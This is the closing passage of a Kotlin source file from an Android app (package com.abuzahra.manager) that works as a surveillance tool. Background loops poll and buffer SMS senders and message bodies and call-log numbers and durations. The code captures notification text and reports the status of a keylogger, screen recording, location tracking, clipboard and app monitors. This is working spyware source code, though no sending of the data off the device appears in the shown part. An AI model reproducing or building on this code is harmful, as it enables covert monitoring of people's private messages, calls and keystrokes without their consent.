   796→   796→                                        mapOf(
   797→   797→                                            "from" to address,
   798→   798→                                            "body" to body,
   799→   799→                                            "type" to (if (type == 1) "received" else "sent")
   800→   800→                                        )
   801→   801→                                    )
   802→   802→                                }
   803→   803→                            }
   804→   804→                        }
   805→   805→                    }
   806→   806→                    
   807→   807→                    delay(10000) // Check every 10 seconds
   808→   808→                } catch (e: Exception) {
   809→   809→                    Log.e(TAG, "SMS monitor error", e)
   810→   810→                    delay(30000)
   811→   811→                }
   812→   812→            }
   813→   813→        }
   814→   814→        
   815→   815→        return "SMS monitoring started"
   816→   816→    }
   817→   817→
   818→   818→    fun smsMonitorStop(): String {
   819→   819→        smsMonitorActive = false
   820→   820→        smsMonitorJob?.cancel()
   821→   821→        smsMonitorJob = null
   822→   822→        return "SMS monitoring stopped"
   823→   823→    }
   824→   824→
   825→   825→    fun isSmsMonitorActive(): Boolean = smsMonitorActive
   826→   826→
   827→   827→    // ===== CALL MONITOR =====
   828→   828→    fun callMonitorStart(context: Context): String {
   829→   829→        if (callMonitorActive) {
   830→   830→            return "Call monitoring already active"
   831→   831→        }
   832→   832→        
   833→   833→        callMonitorActive = true
   834→   834→        
   835→   835→        callMonitorJob = CoroutineScope(Dispatchers.IO).launch {
   836→   836→            var lastCallId = 0L
   837→   837→            
   838→   838→            while (isActive && callMonitorActive) {
   839→   839→                try {
   840→   840→                    if (ActivityCompat.checkSelfPermission(context, Manifest.permission.READ_CALL_LOG) 
   841→   841→                        == PackageManager.PERMISSION_GRANTED) {
   842→   842→                        
   843→   843→                        val projection = arrayOf(
   844→   844→                            CallLog.Calls._ID,
   845→   845→                            CallLog.Calls.NUMBER,
   846→   846→                            CallLog.Calls.DATE,
   847→   847→                            CallLog.Calls.DURATION,
   848→   848→                            CallLog.Calls.TYPE
   849→   849→                        )
   850→   850→                        
   851→   851→                        context.contentResolver.query(
   852→   852→                            CallLog.Calls.CONTENT_URI,
   853→   853→                            projection, null, null, "${CallLog.Calls._ID} DESC"
   854→   854→                        )?.use { cursor ->
   855→   855→                            if (cursor.moveToFirst()) {
   856→   856→                                val id = cursor.getLong(0)
   857→   857→                                
   858→   858→                                if (id > lastCallId) {
   859→   859→                                    lastCallId = id
   860→   860→                                    
   861→   861→                                    val number = cursor.getString(1)
   862→   862→                                    val date = cursor.getLong(2)
   863→   863→                                    val duration = cursor.getLong(3)
   864→   864→                                    val type = when (cursor.getInt(4)) {
   865→   865→                                        CallLog.Calls.INCOMING_TYPE -> "incoming"
   866→   866→                                        CallLog.Calls.OUTGOING_TYPE -> "outgoing"
   867→   867→                                        CallLog.Calls.MISSED_TYPE -> "missed"
   868→   868→                                        else -> "unknown"
   869→   869→                                    }
   870→   870→                                    
   871→   871→                                    // Buffer event locally
   872→   872→                                    com.abuzahra.manager.EventBuffer.addEvent(
   873→   873→                                        "call_log_change",
   874→   874→                                        mapOf(
   875→   875→                                            "number" to number,
   876→   876→                                            "type" to type,
   877→   877→                                            "duration" to duration
   878→   878→                                        )
   879→   879→                                    )
   880→   880→                                }
   881→   881→                            }
   882→   882→                        }
   883→   883→                    }
   884→   884→                    
   885→   885→                    delay(15000) // Check every 15 seconds
   886→   886→                } catch (e: Exception) {
   887→   887→                    Log.e(TAG, "Call monitor error", e)
   888→   888→                    delay(30000)
   889→   889→                }
   890→   890→            }
   891→   891→        }
   892→   892→        
   893→   893→        return "Call monitoring started"
   894→   894→    }
   895→   895→
   896→   896→    fun callMonitorStop(): String {
   897→   897→        callMonitorActive = false
   898→   898→        callMonitorJob?.cancel()
   899→   899→        callMonitorJob = null
   900→   900→        return "Call monitoring stopped"
   901→   901→    }
   902→   902→
   903→   903→    fun isCallMonitorActive(): Boolean = callMonitorActive
   904→   904→
   905→   905→    // ===== NOTIFICATION MONITOR =====
   906→   906→    fun notificationMonitorStart(): Map<String, Any> {
   907→   907→        notificationMonitorActive = true
   908→   908→        val listenerService = com.abuzahra.manager.service.MyNotificationListenerService.getInstance()
   909→   909→        val isConnected = listenerService != null
   910→   910→        val status = if (isConnected) {
   911→   911→            "Notification monitoring started - NotificationListenerService is connected"
   912→   912→        } else {
   913→   913→            "Notification monitoring started - NotificationListenerService NOT connected. Ensure it is enabled in Settings > Notification Access."
   914→   914→        }
   915→   915→        return mapOf(
   916→   916→            "active" to true,
   917→   917→            "service_connected" to isConnected,
   918→   918→            "history_count" to notificationHistory.size,
   919→   919→            "message" to status
   920→   920→        )
   921→   921→    }
   922→   922→
   923→   923→    fun notificationMonitorStop(): Map<String, Any> {
   924→   924→        notificationMonitorActive = false
   925→   925→        return mapOf(
   926→   926→            "active" to false,
   927→   927→            "history_count" to notificationHistory.size,
   928→   928→            "message" to "Notification monitoring stopped. ${notificationHistory.size} notifications captured during session."
   929→   929→        )
   930→   930→    }
   931→   931→    
   932→   932→    fun addNotification(packageName: String, title: String?, text: String?, category: String?) {
   933→   933→        if (notificationMonitorActive) {
   934→   934→            val entry = NotificationEntry(
   935→   935→                timestamp = System.currentTimeMillis(),
   936→   936→                packageName = packageName,
   937→   937→                title = title,
   938→   938→                text = text,
   939→   939→                category = category
   940→   940→            )
   941→   941→            notificationHistory.add(entry)
   942→   942→            
   943→   943→            while (notificationHistory.size > MAX_NOTIFICATION_HISTORY) {
   944→   944→                notificationHistory.poll()
   945→   945→            }
   946→   946→        }
   947→   947→    }
   948→   948→    
   949→   949→    fun getNotificationHistory(): List<Map<String, Any>> {
   950→   950→        return notificationHistory.toList().map { entry ->
   951→   951→            mapOf(
   952→   952→                "timestamp" to entry.timestamp,
   953→   953→                "datetime" to formatTimestamp(entry.timestamp),
   954→   954→                "package" to entry.packageName,
   955→   955→                "title" to (entry.title ?: ""),
   956→   956→                "text" to (entry.text ?: ""),
   957→   957→                "category" to (entry.category ?: "")
   958→   958→            )
   959→   959→        }
   960→   960→    }
   961→   961→
   962→   962→    // ===== GET ALL MONITOR STATUS =====
   963→   963→    fun getAllStatus(): Map<String, Any> {
   964→   964→        return mapOf(
   965→   965→            "keylogger" to mapOf(
   966→   966→                "active" to keyloggerActive,
   967→   967→                "entries" to keylogBuffer.size,
   968→   968→                "accessibility_connected" to (MyAccessibilityService.getInstance() != null)
   969→   969→            ),
   970→   970→            "screen_recording" to screenRecordingActive,
   971→   971→            "location_tracking" to mapOf(
   972→   972→                "active" to locationTrackingActive,
   973→   973→                "history_count" to locationHistory.size
   974→   974→            ),
   975→   975→            "clipboard_monitor" to mapOf(
   976→   976→                "active" to clipboardMonitorActive,
   977→   977→                "history_count" to clipboardHistory.size
   978→   978→            ),
   979→   979→            "wifi_monitor" to wifiMonitorActive,
   980→   980→            "app_monitor" to mapOf(
   981→   981→                "active" to appMonitorActive,
   982→   982→                "log_count" to appUsageLog.size
   983→   983→            ),
   984→   984→            "sms_monitor" to smsMonitorActive,
   985→   985→            "call_monitor" to callMonitorActive,
   986→   986→            "notification_monitor" to mapOf(
   987→   987→                "active" to notificationMonitorActive,
   988→   988→                "history_count" to notificationHistory.size
   989→   989→            ),
   990→   990→            "geofences" to geoFences.size
   991→   991→        )
   992→   992→    }
   993→   993→    
   994→   994→    // ===== LIFECYCLE =====
   995→   995→    fun initialize() {
   996→   996→        loadGeofences()
   997→   997→    }
   998→   998→    
   999→   999→    fun cleanup() {
  1000→  1000→        keyloggerActive = false
  1001→  1001→        screenRecordingActive = false
  1002→  1002→        locationTrackingActive = false
  1003→  1003→        clipboardMonitorActive = false
  1004→  1004→        wifiMonitorActive = false
  1005→  1005→        appMonitorActive = false
  1006→  1006→        smsMonitorActive = false
  1007→  1007→        callMonitorActive = false
  1008→  1008→        notificationMonitorActive = false
  1009→  1009→        
  1010→  1010→        locationJob?.cancel()
  1011→  1011→        clipboardJob?.cancel()
  1012→  1012→        wifiJob?.cancel()
  1013→  1013→        appMonitorJob?.cancel()
  1014→  1014→        smsMonitorJob?.cancel()
  1015→  1015→        callMonitorJob?.cancel()
  1016→  1016→        
  1017→  1017→        locationListener = null
  1018→  1018→    }
  1019→  1019→    
  1020→  1020→    // ===== HELPERS =====
  1021→  1021→    private fun formatTimestamp(timestamp: Long): String {
  1022→  1022→        val sdf = SimpleDateFormat("yyyy-MM-dd HH:mm:ss", Locale.getDefault())
  1023→  1023→        return sdf.format(Date(timestamp))
  1024→  1024→    }
  1025→  1025→    
  1026→  1026→    private fun getDateString(): String {
  1027→  1027→        val sdf = SimpleDateFormat("yyyy-MM-dd", Locale.getDefault())
  1028→  1028→        return sdf.format(Date())
  1029→  1029→    }
  1030→  1030→}
  1031→  1031→